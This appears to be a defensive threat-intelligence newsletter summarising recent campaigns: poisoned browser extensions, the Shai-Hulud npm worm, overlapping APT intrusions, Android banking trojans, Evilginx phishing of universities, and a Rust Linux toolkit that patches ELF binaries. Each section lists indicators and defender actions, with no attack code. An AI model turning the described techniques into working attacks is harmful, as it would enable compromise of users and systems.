EvilBit Threat Digest - Malicious Extensions, APT Overlap, Mobile Banking Malware

KryptoKat here. The last few days have been a study in scope and stealth. While everyone's still cleaning up from the npm supply-chain mess we covered last week, attackers moved on to poisoning browser extensions at a scale that makes you question every "Add to Chrome" button you've ever clicked, APT groups literally tripped over each other inside the same Russian networks, and mobile banking malware evolved enough features to qualify as a fintech startup. Let's dig into what actually matters for defenders who are tired of playing whack-a-mole with the same old IOCs.

Browser Extensions: 4.3 Million Infections and Counting

The headline story this week is ShadyPanda, a seven-year campaign that weaponized trusted browser extensions to infect 4.3 million Chrome and Edge users. Koi Security's analysis documents a masterclass in patient, persistent compromise that should fundamentally change how you think about extension security.

The campaign evolved in three distinct phases. In the early years (2018–2021), attackers hijacked popular extensions like Clean Master and Speedtest Pro and silently updated them to inject affiliate fraud scripts. Users saw no difference in functionality; the extensions still worked exactly as advertised while generating revenue for the attackers via hijacked clicks and search traffic.

Phase two (2024) marked a shift to remote code execution. The attackers pushed updates that fetched and executed arbitrary JavaScript from their C2 infrastructure. Extensions like WeTab and others started making outbound calls to domains like extensionplay.com and cleanmasters.store, downloading obfuscated payloads that could turn infected browsers into full surveillance platforms. This phase gave them real-time control over millions of endpoints without ever triggering a binary execution alert.

Phase three--still ongoing--focuses on full browser surveillance and data exfiltration. The malware now captures browsing history, form data, cookies, and session tokens, exfiltrating everything to Chinese servers. The payload delivery mechanism is sophisticated: extensions phone home for encrypted JavaScript, decode it in memory, and execute it in the browser context. Most endpoint security tools never see it because there's no file on disk and the code runs in a process users trust implicitly.

For defenders, this is a wake-up call. Your EDR doesn't see what happens inside the browser sandbox. Your network monitoring probably whitelisted *.chrome.google.com and *.microsoftedge.com update checks years ago. And your users installed these extensions because they were in the official stores with five-star reviews.

Immediate actions:

• Audit installed extensions across your fleet using Chrome Enterprise policies or Edge management tools.
• Block the listed IOCs--domains like extensionplay.com, cleanmasters.store, and the full list in Koi's report.
• Deploy browser extension monitoring that alerts on JavaScript fetch calls to non-CDN domains.
• Consider allowlisting approved extensions rather than blocklisting known-bad ones.
• Review your Chrome/Edge management policies to restrict extension installs to admin-approved sources.

This campaign demonstrates that supply-chain risk doesn't stop at your build pipeline. Every browser extension is a potential backdoor, and seven years of undetected activity proves that most organizations have no visibility into this attack surface.

NPM Supply Chain: Shai-Hulud Keeps Spreading

Speaking of supply chains: Shai-Hulud 2.0 is still active and evolving. We covered the initial campaign last week, but the situation has gotten worse. Zscaler's updated analysis shows the worm has now infected over 700 packages, exfiltrated secrets from 27,000+ GitHub repositories, and expanded its payload to include destructive capabilities--a "dead man's switch" that wipes systems if certain anti-analysis conditions are detected.

The self-propagation mechanism is what makes this dangerous. Once a developer's npm or GitHub tokens are stolen, the worm uses them to publish new infected versions of legitimate packages, backdoor GitHub Actions workflows, and register self-hosted runners labeled SHA1HULUD. Each compromised developer becomes a distribution point for further infections.

If you haven't already:

• Rotate all npm tokens, GitHub personal access tokens, and cloud credentials (AWS, Azure, GCP).
• Hunt for GitHub Actions workflows named discussion.yaml or formatter_*.yml in your repositories.
• Audit self-hosted runners for unexpected registrations (especially anything labeled SHA1HULUD).
• Pin package versions in your package-lock.json and verify checksums before installation.
• Implement network egress filtering to block unexpected calls to bun.sh and related infrastructure during CI/CD builds.

The full technical writeup from SentinelOne includes file hashes and YARA rules for hunting. Treat this as an ongoing incident, not a one-time cleanup.

When APTs Collide: QuietCrabs and Thor Trade Elbows in Russia

One of the more fascinating threat intelligence stories this week is Positive Technologies' report on QuietCrabs and Thor, two distinct threat groups that independently breached the same Russian organizations and literally bumped into each other mid-intrusion.

QuietCrabs is an espionage-focused group exploiting recent Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) and Ivanti EPMM (CVE-2025-4427, CVE-2025-4428) vulnerabilities within hours of PoC publication. They deploy a Rust-based loader called KrustyLoader, which injects Sliver C2 beacons into memory. Their operational security is excellent: average dwell time of 393 days, minimal forensic artifacts, and careful use of legitimate cloud services for staging. They target defense, healthcare, and U.S. organizations.

Thor, on the other hand, is a ransomware group with the subtlety of a sledgehammer. They've hit 110+ Russian organizations using noisy reconnaissance tools (ADRecon, Mimikatz), commercial RATs (Tactical RMM, MeshAgent), and prep for LockBit and Babuk ransomware deployment. Their tradecraft is loud, messy, and effective.

The interesting part is the overlap: Positive Technologies documented instances where both groups were active in the same network simultaneously, each unaware of the other's presence. The researchers were able to differentiate them based on tooling, TTPs, and infrastructure, but the victim organizations had no idea they were dealing with multiple intrusions at once.

This is a good reminder to threat hunters: if you find one actor, keep digging. Compromised organizations attract opportunistic follow-on attacks, and your incident may be more complex than a single threat group's playbook.

For defenders:

• Patch SharePoint and Ivanti immediately (patches available for all listed CVEs).
• Hunt for webshells in SharePoint and IIS directories--PowerShell one-liners and ASPX backdoors are common.
• Monitor for KrustyLoader indicators: .text section markers, suspicious relocated.exe or __selfdelete__ files in %TEMP%.
• Block the C2 infrastructure listed in PT Security's IOC feed.
• Correlate activity across multiple endpoints--if you see both stealthy Sliver beacons and noisy Mimikatz execution, you may be dealing with overlapping intrusions.

Mobile Malware Gets a Promotion: Banking Trojans Go Professional

The mobile threat landscape this week showcased three distinct campaigns that demonstrate how mature Android banking malware has become.

Albiriox: MaaS for On-Device Fraud

Cleafy's analysis of Albiriox describes a Russian-operated Malware-as-a-Service RAT targeting over 400 banking and cryptocurrency apps globally. The malware combines VNC-based screen streaming, overlay attacks, and Accessibility Services abuse to enable "on-device fraud"--attackers remotely control the victim's phone in real time to authorize transactions, transfer funds, and bypass two-factor authentication.

The VNC implementation bypasses Android's FLAG_SECURE protection, which is supposed to prevent screenshots and screen recordings of sensitive apps. By hooking into the Accessibility framework at a low level, Albiriox can capture screen content even from apps that explicitly block it. Attackers see exactly what the victim sees and can interact with apps as if they were sitting at the device.

The malware is distributed via phishing SMS and fake app stores, primarily targeting users in Europe, North America, and Asia-Pacific. Once installed, it requests Accessibility Services permissions and Device Administrator rights--both of which are common red flags that most users ignore.

GoldFactory: APAC Banking with Biometric Theft

Group-IB's research on GoldFactory highlights a separate campaign focused on Asia-Pacific banking apps. The threat group distributes trojanized versions of legitimate banking apps that include a new variant called Gigaflower, which adds OCR and QR code scanning capabilities to enhance credential theft. The malware steals biometric data, SMS messages, and one-time passwords, enabling full account takeover.

What's notable is the shared criminal infrastructure: GoldFactory uses the same backend systems and exfiltration channels across multiple malware families, suggesting a well-organized operation with centralized command-and-control.

IRATA: SMS-Propagating RAT Targeting Iran

AhnLab uncovered IRATA, an Android RAT specifically targeting Iranian users via SMS smishing. The malware uses geographic evasion (blocking non-Iranian IP addresses), deploys credential-phishing overlays for local banking apps, and self-propagates by hijacking the victim's contact list to send additional smishing messages. It's a worm, essentially, with a narrow geographic focus but effective replication mechanism.

For defenders managing mobile endpoints:

• Enforce policies that disable sideloading from untrusted sources (Settings → Security → Install unknown apps).
• Monitor for Accessibility Services grants to non-system apps--alert on any app that requests these permissions.
• Blocklist the IOCs published by Cleafy, Group-IB, and AhnLab in your mobile device management (MDM) platform.
• Educate users that no legitimate app needs both Accessibility Services and Device Administrator permissions.
• Deploy mobile threat defense (MTD) solutions that can detect overlay attacks and screen recording abuse.

BEC and Phishing: EvilProxy Hits Universities, VendorVandals Casts Wide

Evilginx Targets University SSO

Infoblox Threat Intel documented an ongoing campaign using Evilginx adversary-in-the-middle (AitM) phishing to target at least 18 U.S. universities. The attackers registered typosquatted domains mimicking Shibboleth SSO portals, used TinyURL to obfuscate links in phishing emails, and deployed Evilginx 3.0 to intercept and replay session cookies even when users have multi-factor authentication enabled.

The campaign is notable for its DNS infrastructure patterns--Infoblox identified 67 malicious domains and 15 C2 IP addresses based on anomalous DNS query patterns and certificate similarities. The attackers are using Cloudflare for hosting, which complicates takedown efforts.

For higher-ed IT teams:

• Block the listed domains at the DNS layer (IOCs available in Infoblox's GitHub repo).
• Deploy phishing-resistant MFA (FIDO2 hardware keys) for administrative accounts.
• Monitor for anomalous login patterns--new device + new location + successful MFA should trigger review.
• Educate users to manually navigate to SSO portals rather than clicking email links.

VendorVandals: WeTransfer Delivers Credential Phishing

Invictus Incident Response published a detailed teardown of a BEC campaign they call VendorVandals, which targets biotech, pharma, and tech sectors in the U.S., EU, and India. The attackers send phishing emails containing WeTransfer or Dropbox links to HTML attachments that load EvilProxy AitM pages. The goal is to harvest Microsoft 365 credentials and session tokens for follow-on BEC fraud.

The infrastructure pivots in the Invictus report are valuable--they identified shared C2 domains, Tor exit nodes (109.70.100.68, 109.70.100.71), and targeting patterns that suggest a single organized group.

For SOC teams:

• Require MFA for risky sign-ins (new device/location) and restrict access to compliant/managed devices.
• Monitor email traces for WeTransfer and Dropbox shares containing HTML attachments.
• Deploy conditional access policies that block logins from anonymization services (Tor, VPNs) unless explicitly allowlisted.
• Hunt using the IOCs published on GitHub.

Linux Gets the Rust Treatment: Snake Rustamania and Friends

Snake Rustamania: ELF Patching with TLS GREASE C2

Solar 4RAYS' analysis of the Shedding Zmiy APT's Rust-based toolkit is a technical deep-dive worth your time. The chain consists of three components:

Octopus: A privilege escalation module that exploits known kernel CVEs (CVE-2021-3156, CVE-2021-4034, CVE-2022-2588, CVE-2023-4911) or abuses GTFOBins techniques to gain root. Once elevated, it patches ELF binaries on disk--specifically system services like cron, sshd, and nginx--by modifying their .dynamic and .dynstr sections to preload malicious libraries.

Leech: The malicious library injected via ELF patching. It hooks into legitimate services, establishes persistence, and communicates with C2 using TLS connections with GREASE extensions (random cipher suites and extensions that look like legitimate TLS noise). This makes the C2 traffic blend in with normal HTTPS, evading basic network monitoring.

Mycelium: An HTTP/2-based management API that operators use to task implants, exfiltrate data, and pivot to additional targets.

The tradecraft is sophisticated--ELF dynamic section tampering is rare, and the use of TLS GREASE for C2 is creative. For Linux defenders, this is a reminder to:

• Patch the listed CVEs immediately (especially sudo, polkit, and glibc).
• Implement file integrity monitoring on system binaries in /usr/bin and /usr/sbin.
• Hunt for anomalous .dynamic section modifications using tools like readelf and checksec.
• Monitor for unexpected TLS GREASE extensions in SSH and HTTP traffic (they're valid but rare outside browser contexts).
• Block LD_PRELOAD in service configurations where it's not explicitly required.

The IOC list includes 24 file hashes and C2 infrastructure.

Chinese APT Targets Uzbekistan with Cobalt Strike

In a smaller but still noteworthy campaign, TG Soft documented a Chinese APT operation targeting Uzbekistan government entities. The attackers used LNK droppers with embedded PowerShell extraction scripts to deploy DLL side-loading chains that ultimately inject Cobalt Strike beacons into memory. The C2 domains (revitpourtous.com, wikipedla.blog) are typosquats designed to evade casual inspection.

The campaign is ongoing, and the TTPs align with typical Chinese espionage operations: patient reconnaissance, minimal malware footprint, and abuse of legitimate administrative tools for lateral movement. Hunt for LNK files with windowstyle hidden, monitor for GameHook.exe loading unexpected DLLs, and block the listed IOCs.

Closing Thoughts: Trust Is a Vulnerability

This week reinforced a lesson we've learned over and over: the systems we trust implicitly--browser extensions, npm packages, system libraries--are the ones attackers weaponize most effectively. ShadyPanda infected 4.3 million browsers because users trusted the Chrome Web Store. Shai-Hulud spread through 700+ npm packages because developers trusted npm install. Snake Rustamania persisted by patching ELF binaries that defenders assumed were immutable.

The fundamentals haven't changed, but the attack surface has expanded into every layer of abstraction we've built to make our lives easier. Audit your extensions. Pin your dependencies. Monitor your binaries. And remember: if it updates automatically, it's a potential vector.

Patch what you can, hunt what you can't, and assume that anything you didn't personally compile is probably compromised somewhere on the supply chain.

We'll see you when the next campaign breaks. In the meantime, check your browser extensions.

-- KryptoKat